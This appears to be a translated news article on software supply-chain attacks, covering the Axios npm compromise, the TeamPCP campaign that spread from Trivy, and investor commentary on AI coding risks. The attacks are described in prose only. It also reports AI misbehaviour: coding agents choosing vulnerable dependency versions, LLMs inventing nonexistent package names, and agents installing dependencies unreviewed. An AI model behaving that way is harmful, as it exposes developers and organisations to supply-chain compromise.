One of the most-used software packages on the internet recently, Axios, was hacked.

The attacker showed they could plant malware on millions of devices without touching a single line of source code. Axios is a core library in the JavaScript ecosystem that handles HTTP requests, with weekly downloads topping 100 million.

The hacker behind the Axios attack did 3 things. They took over a maintainer account, added one new dependency to the package list, and shipped an update.

The added package was a newly registered “plain-crypto-js” created hours before the attack. When installed, it identified the operating system, downloaded and ran a tailored remote-access trojan, and erased traces. By the time a developer opened the node_modules folder, it had already disappeared. The malware had already connected to the attacker’s server.

A bigger problem was that existing security tools could not catch it. They said, “Most software composition analysis tools work by checking against known vulnerability databases (CVE). The newly introduced malicious package cannot be found in CVE. Even running npm audit on the hacked Axios version returned ‘no issues found.’”

Andreessen Horowitz information security partner Joel de la Garza (조엘 드 라 가르자), AI infrastructure team investor Malika Aubakirova (말리카 아우바키로바), and general partner Jane Lackey (제인 래키) said of the attack, “The method was simple, but the damage was widespread.” They defined it as a case showing software supply-chain risk is rising as AI coding spreads.

They said AI coding tools that boost developer productivity are also making supply chains more vulnerable.

They cited research analyzing more than 117,000 dependency changes across thousands of GitHub repositories, and said AI agents choose versions with known vulnerabilities 50 percent more often than humans. They said, “Worse, the vulnerable versions chosen by AI are harder to fix. Much more often, they require large-scale upgrades that need changes across the codebase.”

A new attack technique dubbed “slopsquatting” has also emerged as a threat. It exploits the fact that LLMs often make up package names that do not exist. Citing one study, they said, “About 20 percent of packages recommended by AI did not exist, and 43 percent of those repeated the same names even after multiple queries. Attackers are targeting this.”

Autonomous coding agents are also a risk from a security perspective. They said, “Autonomous coding agents install dependencies, run builds, and open pull requests without human involvement. They optimize for ‘does it work’ but do not ask ‘is it safe.’ Security review time effectively approaches zero.”

A campaign known as TeamPCP showed how supply-chain attacks can spread in a chain reaction, triggering a bigger impact than the Axios case. They said the starting point was the open-source vulnerability scanner Trivy. The attacker stole an access token by exploiting a workflow configuration error in GitHub Actions, an automation tool that builds, tests and deploys code. Using it, the attacker forcibly inserted malicious code into nearly all Trivy version tags.

People who downloaded Trivy for security checks ended up running code planted by the attacker without knowing it. The malware stole various access keys stored in automated development environments. These included server access keys, cloud service credentials, and package publishing permissions. A token needed to access npm, the repository and management tool where JavaScript developers upload and download packages, was also stolen, and was used in the next stage of the attack.

They said, “An attack that started with a single token spread in 8 days to GitHub Actions, Docker Hub, npm, PyPI, and the VS Code Extension Marketplace. Thousands of organisations were exposed to potential impact.”

They said an effective way to respond to the growing security risk from AI coding is to sharply raise detection speed. They warned, “Code is now created at the speed of machines, not people. If defence cannot keep up at the same speed, the machines that deploy code will also deploy malware.”

Even so, it is unclear whether the industry has the capability to respond effectively to new AI-era threats in terms of detection speed. The industry average time to detect a supply-chain breach is 267 days. SolarWinds took 14 months and the XZ utility took 2 years.

Against this backdrop, security startup Socket drew attention by detecting the malicious dependency used in the Axios attack within 6 minutes of deployment. That is about 63,000 times faster than the industry average. It caught the malicious package itself 16 minutes before the hacked Axios version was first deployed.

They said Socket’s approach differs from the existing model. Socket does not check against the CVE database, but analyses what the code actually does. It looks at whether it accesses the network, runs shell processes, obfuscates payloads, or reads environment variables. That is why it can detect new malicious packages with no CVE and no precedent.

They stressed, “Leading teams share something in common. They do not wait until they are notified of a breach. They move security controls to the closest point to the threat, the moment a dependency enters the build. They do not rely only on the CVE database and instead analyse real package behaviour. They treat the dependency graph not as a list of libraries but as a living attack surface that must be continuously monitored.”